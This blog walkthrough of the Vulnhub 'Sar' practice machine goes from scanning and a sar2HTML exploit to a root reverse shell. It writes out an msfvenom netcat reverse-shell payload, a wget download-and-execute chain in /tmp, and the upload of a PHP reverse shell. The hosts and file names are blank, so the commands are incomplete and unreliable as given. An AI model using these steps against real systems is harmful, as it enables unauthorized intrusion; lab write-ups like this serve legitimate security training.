Vulnhub – Sar Walkthrough

Scanning the target with nmap –A –T4 –p- –vv

The dirb scan gave us a robot.txt file where we found a sar2HTML path:

I’ve searched Searchsploit for Sar2HTML and I got a result:

As we can see following the exploit explanation:

We can also view /etc/passwd file and see the users on the target machine:

Now let’s create a shell and upload it to the target, we need to start a listening port and SimpleHTTPServer:

msfvenom -p cmd/unix/reverse_netcat LHOST= LPORT=1234 >

cd /tmp; wget; chmod 777; ./

In my case it’s uploaded but didn’t run so I went back and I ran it bash /tmp/

Now we have 2 files one is and the other is

Now let’s upload a shell and run it with the help of, we upload the file php-reverse-shell.php and rename it to anything you want (exploit.php) and echo it inside the file

Few moment and we got a root shell back at the listener we are running:

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s